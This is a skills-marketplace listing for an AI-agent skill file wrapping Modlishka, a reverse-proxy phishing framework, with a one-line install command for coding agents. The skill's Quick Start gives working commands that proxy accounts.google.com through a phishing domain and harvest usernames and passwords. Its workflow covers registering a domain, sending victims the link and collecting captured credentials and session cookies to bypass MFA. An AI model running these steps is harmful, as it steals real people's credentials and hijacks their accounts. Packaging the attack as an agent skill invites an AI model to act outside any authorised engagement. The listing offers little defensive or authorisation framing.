aeondave/modlishka
offensive-tools/social-engineering/modlishka/SKILL.md
Modlishka: flexible reverse proxy phishing framework that captures credentials and session cookies while bypassing 2FA/MFA. Use when conducting phishing campaigns targeting OTP or push MFA by acting as a transparent MITM between victim and the real site.
$ install --global
skillsauthnpx skillsauth add aeondave/malskill modlishkaInstall this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.
Security Scan Results
3 of 9 scanners reported clean
Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.
3
Scanners Passed
9
Scanners in report
Clean
TrivyContainer and dependency vulnerability scanner
95%
Clean
SemgrepStatic code analysis for vulnerabilities
95%
Clean
mcp-scan (Snyk)Model Context Protocol security validation
95%
Skipped
Snyk (dep)Open source security scanning
50%
Skipped
Socket.devSupply chain security analysis
50%
Skipped
VirusTotalMulti-engine malware detection
50%
Skipped
CrowdStrikeAdvanced threat intelligence
50%
Skipped
OSV-ScannerOpen Source Vulnerability database check
50%
Skipped
OWASP Dep-Check
50%
Last scanned: Mar 31, 2026, 9:34 PM56.7s1 file scanned
SKILL.md
- name:
- modlishka
- description:
- Modlishka: flexible reverse proxy phishing framework that captures credentials and session cookies while bypassing 2FA/MFA. Use when conducting phishing campaigns targeting OTP or push MFA by acting as a transparent MITM between victim and the real site.
- license:
- GPL-3.0
- compatibility:
- Linux. Build with Go 1.14+. Requires valid TLS cert for the phishing domain.
- author:
- AeonDave
- version:
- 1.0
Modlishka
Reverse-proxy phishing that bypasses 2FA/MFA.
Quick Start
git clone https://github.com/drk1wi/Modlishka && cd Modlishka && make
./Modlishka -target https://accounts.google.com \
-phishing phish.attacker.com \
-cert cert.pem -key key.pem \
-credParams username=,password=
./Modlishka -config config.json
Core Flags
| Flag | Purpose |
|------|---------|
| -target | Real site to proxy |
| -phishing | Attacker phishing domain |
| -cert / -key | TLS certificate paths |
| -credParams | Field names to harvest |
| -trackingCookie | Victim tracking cookie name |
| -jsRules | JavaScript inject rules |
| -config | JSON config file path |
Workflow
- Register phishing domain + get TLS cert (Let's Encrypt)
- Fill
config.jsonwith target, domain, TLS paths - Start Modlishka; send victim the phishing URL
- Observer panel at
http://127.0.0.1:8888shows captured credentials + session cookies
Resources
| File | When to load |
|------|--------------|
| references/ | Config template, operator panel usage |
Related Skills
aeondave/vibe-audit-technique
development
VerifiedTrustedCommunity
White-box auditing methodology for AI-generated ('vibe-coded') applications. Focuses on modern stack misconfigurations (Supabase, Next.js, Vercel).
4SKILL.mdUpdated Jun 12, 2026
aeondave/source-review-technique
development
VerifiedTrustedCommunity
Hybrid AI/Deterministic SAST methodology for discovering zero-day vulnerabilities in source code. Orchestrates structural search with AI-driven data flow and sink validation.
4SKILL.mdUpdated Jun 12, 2026
aeondave/hardware-technique
development
VerifiedTrustedCommunity
Auth assessment: hardware/embedded methodology; UART/JTAG/SWD/SPI/I2C, firmware extraction, boot/debug paths, embedded OS evidence.
4SKILL.mdUpdated Jun 12, 2026
aeondave/container-technique
devops
VerifiedTrustedCommunity
Container methodology: Identifying containerization limits, Docker/K8s misconfigurations, and executing escapes to the host node.
4SKILL.mdUpdated Jun 12, 2026